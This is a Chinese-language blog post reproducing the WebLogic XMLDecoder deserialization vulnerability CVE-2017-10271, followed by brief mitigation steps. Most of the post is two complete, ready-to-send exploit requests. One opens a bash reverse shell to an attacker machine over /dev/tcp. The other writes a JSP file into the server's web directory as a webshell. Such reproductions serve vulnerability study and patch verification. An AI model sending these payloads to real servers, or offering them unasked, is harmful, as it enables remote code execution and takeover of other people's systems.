Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)檢測與利用復現
阿新 • • 發佈:2018-12-09
Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。
漏洞環境搭建
可以參考:
https://blog.csdn.net/qq_29647709/article/details/84892582
漏洞檢測
檢測工具下載
https://pan.baidu.com/s/1bpg3ppl
漏洞利用
反彈shell
poc:
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.15:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 637 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.1.31/4444 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
首先使用kali192.168.1.31在4444埠偵聽埠
使用brupsuit傳送poc:
來到kali發現成功接收到反彈的shell:
寫入shell
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.15:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 638 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"><string> <![CDATA[ <% out.print("test"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
使用brup構造發包:
訪問shell
http://192.168.1.15:7001/bea_wls_internal/test.jsp
漏洞防禦
1、臨時解決方案 根據業務所有需求,考慮是否刪除WLS-WebServices元件。包含此元件路徑為:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war Middleware/wlserver_10.3/server/lib/wls-wsat.war
以上路徑都在WebLogic安裝處。刪除以上檔案之後,需重啟WebLogic。確認http://weblogic_ip/wls-wsat/ 是否為404頁面。
2、’官方補丁修復 前往Oracle官網下載10月份所提供的安全補丁。
參考連結:
https://paper.seebug.org/487/
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices元件反序列化漏洞分析.md